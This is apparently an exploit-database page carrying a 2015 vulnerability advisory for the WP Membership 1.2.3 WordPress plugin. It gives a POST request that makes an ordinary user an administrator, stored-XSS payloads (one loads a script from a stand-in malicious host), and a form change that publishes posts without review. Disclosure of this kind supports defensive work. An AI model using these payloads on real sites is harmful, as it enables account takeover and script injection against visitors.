Menu

Search for hundreds of thousands of exploits

"WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities"

Author

Exploit author

"Panagiotis Vagenas"

Platform

Exploit platform

php

Release date

Exploit published date

2015-05-21

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
# Exploit Title: WordPress WP Membership plugin [Multiple Vulnerabilities]
# Date: 2015/05/19
# Exploit Author: Panagiotis Vagenas
# Contact: https://twitter.com/panVagenas
# Vendor Homepage: http://wpmembership.e-plugins.com/
# Software Link: http://codecanyon.net/item/wp-membership/10066554
# Version: 1.2.3
# Tested on: WordPress 4.2.2
# Category: webapps

========================================
* 1. Privilege escalation
  ========================================

1.1 Description

Any registered user can perform a privilege escalation through 
`iv_membership_update_user_settings` AJAX action.
Although this exploit can be used to modify other plugin related data 
(eg payment status and expiry date), privilege escalation can lead to a 
serious incident because the malicious user can take administrative role 
to the infected website.

1.2 Proof of Concept

* Login as regular user
* Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` 
with data: 
`action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 


1.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

1.4 Solution

No official solution yet exists.

========================================
* 2. Stored XSS
========================================

2.1 Description

All input fields from registered users aren't properly escaped. This 
could lead to an XSS attack that could possibly affect all visitors of 
the website, including administators.

2.2 Proof of Concept

* Login as regular user
* Update any field of your profile appending at the end
     `<script>alert('XSS');</script>`
     or
     `<script src=http://malicious .server/my_malicious_script.js/>`

2.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

2.4 Solution

No official solution yet exists.

========================================
* 3. Unauthorized post publish and stored XSS
  ========================================

3.1 Description

Registered users can publish a post without administrator confirmation. 
Normally all posts submitted  by users registered with WP Membership 
plugin are stored with the status `pending`. A malicious user though can 
publish his post by crafting the form is used for submission.

3.2 Proof of Concept

* Login as regular user
  whom belongs to a group that can submit new posts
* Visit the `New Post` section at your profile
* Change field `post_status`:
     <select id="post_status" class="form-control" name="post_status">
         <option value="publish" selected=selected>Pending 
Review</option>
         <option value="draft">Draft</option>
     </select>

The post gets immediately published after you submit the form and is 
visible to all visitors of the website.

In addition a stored XSS attack can be performed due to insufficient 
escaping of the post content input.

3.3 Actions taken after discovery

Vendor was informed on 2015/05/19.

3.4 Solution

No official solution yet exists.

3.5 Workaround

Prevent users from submitting new posts through the relative option in 
plugin's settings
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-04-22 "WordPress Plugin Contact Form Builder 1.0.67 - Cross-Site Request Forgery / Local File Inclusion" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Social Media Widget by Acurax 3.2.5 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin Admin Menu Tree Page View 2.6.9 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin CMS Tree Page View 1.4 - Cross-Site Request Forgery / Privilege Escalation" webapps php "Panagiotis Vagenas"
2018-01-10 "WordPress Plugin WordPress Download Manager 2.9.60 - Cross-Site Request Forgery" webapps php "Panagiotis Vagenas"
2016-03-03 "WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-24 "WordPress Plugin Extra User Details 0.4.2 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WooCommerce Store Toolkit 1.5.5 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin WP User Frontend < 2.3.11 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2016-02-08 "WordPress Plugin User Meta Manager 3.4.6 - Information Disclosure" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2016-02-04 "WordPress Plugin User Meta Manager 3.4.6 - Privilege Escalation" webapps php "Panagiotis Vagenas"
2015-12-03 "Gnome Nautilus 3.16 - Denial of Service" dos linux "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-12-03 "WordPress Plugin Users Ultra 1.5.50 - Blind SQL Injection" webapps php "Panagiotis Vagenas"
2015-11-18 "WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload" webapps php "Panagiotis Vagenas"
2015-06-04 "WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion" webapps php "Panagiotis Vagenas"
2015-05-27 "WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting" webapps php "Panagiotis Vagenas"
2015-05-21 "WordPress Plugin WP Membership 1.2.3 - Multiple Vulnerabilities" webapps php "Panagiotis Vagenas"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.